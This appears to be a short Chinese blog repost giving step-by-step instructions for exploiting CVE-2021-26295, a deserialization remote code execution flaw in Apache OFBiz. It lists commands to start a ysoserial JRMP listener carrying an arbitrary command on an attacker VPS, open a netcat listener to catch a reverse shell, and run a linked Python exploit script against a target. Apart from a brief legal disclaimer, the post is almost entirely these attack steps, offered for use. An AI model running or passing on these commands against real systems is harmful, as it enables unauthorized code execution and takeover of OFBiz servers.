CVE-2021-26295 EXP

CVE-2021-26295

CVE-2021-26295 EXP可成功反弹壳牌

本文以及工具仅限于技术共享,不能用于非法用途,否则会导致一切后果自行承担。

Apache OFBiz 序列化远程代码执行漏洞

触发命令执行EXP

1. VPS启动RMI监听9999端口

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] '

2. VPS启动nc监听64444端口

nc -lvp 64444

3.执行python脚本

python3 cve-2021-26295_exp.py <目标>  < vps_ip >  < vps_port >

示例

CVE-2021-26295 EXP

CVE-2021-26295 EXP

可以利用

https://github.com/r0ckysec/CVE-2021-26295/blob/main/cve-2021-26295_exp.py

CVE-2021-26295 EXP


版权归原作者所有,如若转载,请注明出处:https://www.ciocso.com/article/520.html

发表评论

登录后才能评论
跳至工具栏